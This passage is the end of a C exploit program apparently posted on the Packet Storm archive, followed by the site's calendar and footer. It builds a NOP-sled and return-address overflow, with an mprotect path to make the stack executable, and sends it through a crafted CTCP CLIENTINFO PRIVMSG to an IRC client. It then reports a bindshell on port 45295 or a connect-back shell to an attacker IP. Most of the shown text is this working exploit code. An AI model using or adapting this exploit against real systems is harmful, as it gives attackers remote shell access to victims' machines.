to mark the stack PROT_WRITE|PROT_READ|PROT_EX
EC ;)

*/
size = -1;
memset(ret_buffer, 0x90, sizeof(ret_buffer));
memcpy(ret_buffer + 28, &targets[type - 1].mpro
tect, 4);
memcpy(ret_buffer + 32, &targets[type - 1].ret,
4);
memcpy(ret_buffer + 36, &targets[type - 1].ret,
4); // void *addr
memcpy(ret_buffer + 40, &size, 4);
// size_t len
ret_buffer[44] = 0x07;
// int prot
ret_buffer[200] = 0x00;

} else {

memset(ret_buffer, 0x0, sizeof(ret_buffer));

for(i = 0; i < sizeof(ret_buffer) - 4; i += 4)
{
ret_buffer[i + 0] = (targets[type - 1].
ret >> 0) & 0xff;
ret_buffer[i + 1] = (targets[type - 1].
ret >> 8) & 0xff;
ret_buffer[i + 2] = (targets[type - 1].
ret >> 16) & 0xff;
ret_buffer[i + 3] = (targets[type - 1].
ret >> 24) & 0xff;
}
}

memset(buffer, 0x90, sizeof(buffer));
memcpy(buffer - sizeof(jmp_code) - 2, jmp_code, sizeof(
jmp_code) - 1);
buffer[sizeof(buffer) - 1] = 0x00;

if (send_text(sock_server_new,
":%s!netric@netric.org PRIVMSG a: %cCLIENTINFO
%s%c\r\n",
buffer, 0x01, ret_buffer, 0x01) < 0) {
if (verbose == 1) {
fprintf(stderr, "[%s] send failed!\n",
inet_ntoa(saddr_in2.sin_addr));
exit(1);
}
}

if (connectback == 0) {
if (log) fprintf(log, "[%s] %s - Bindshell is r
unning on port 0xb0ef(45295).\n",
inet_ntoa(saddr_in2.sin_addr), nick);
fprintf(stderr, "[%s] Bindshell is running on p
ort 0xb0ef(45295).\n",
inet_ntoa(saddr_in2.sin_addr));
} else {
if (log) fprintf(log, "[%s] %s - Connecting to
%d.%d.%d.%d:45295.\n",
inet_ntoa(saddr_in2.sin_addr), nick, ip
1, ip2, ip3, ip4);
fprintf(stderr, "[%s] Connecting to %d.%d.%d.%d
:45295.\n",
inet_ntoa(saddr_in2.sin_addr), ip1, ip2
, ip3, ip4);
}

close(sock_server_new);
exit(0);
}

close(sock_server_new);
}

return 0;
}

/* EOF */

Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close